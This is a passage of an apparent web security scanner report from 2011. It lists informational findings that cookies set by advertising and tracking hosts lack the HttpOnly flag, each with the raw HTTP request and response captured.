GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304955323.101,wait-%3E10000,&1304955323232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

11.24. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25746

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...

11.25. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=13933&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU6lf.fVeAIymmN1SQMQiY3K8TkjADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQZQKgq8xSjICExPOxn5gRSDAR8DIzMjCxMrPxsjOyMHIycjFyM3Iw8jLyMfWAFLJqMIUN3SArAuBTOIYAiTCKMoUFh.FzcrE3aNi90ZgY6CJVqQCxgAgheTPA--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUdGc9RhW_mTSRLtae_2aqZWuBa4kDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWdgrkEgYGANcJlFc-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:44 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=101339&t=2
Content-Length: 0
Date: Mon, 09 May 2011 15:35:43 GMT


11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif?address=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm&ref=&r=0.3293152619153261&TS=5963a0a2-47c8-4669-a18c-5cf46798e698&err= HTTP/1.1
Host: atd.agencytradingdesk.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=VsR1CHgGqJ2K; atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:42 AM|6/8/2011 10:00:42 AM~1000138|1000187|1003017||296|-1|-1|WI|5/9/2011 11:29:32 AM|6/8/2011 11:29:32 AM

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:49 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:42 AM|6/8/2011 10:00:42 AM~1000138|1000187|1003017||296|-1|-1|WI|5/9/2011 11:36:49 AM|6/8/2011 11:36:49 AM; expires=Wed, 08-Jun-2011 15:36:49 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/GIF
Content-Length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

GIF89a.............!.......,........@..D.;

11.27. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035073&rn=1981680086&c7=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c8=Business%20news%20articles%20and%20blogs%20-%20The%20Christian%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:34:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:34:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.28. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=2114357914 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 15:35:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.29. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732017&c4=194941149&c5=1&c6=41&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c9=&c10=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&c15=&1304955322131 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; BMX_G=method->-1,ts->1304954985; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 15:35:23 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 15:35:23 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.30. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; vf=1; V=wOebwAz4UvVv; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 15:38:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 15:38:27 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 09 May 2011 15:38:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


11.31. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
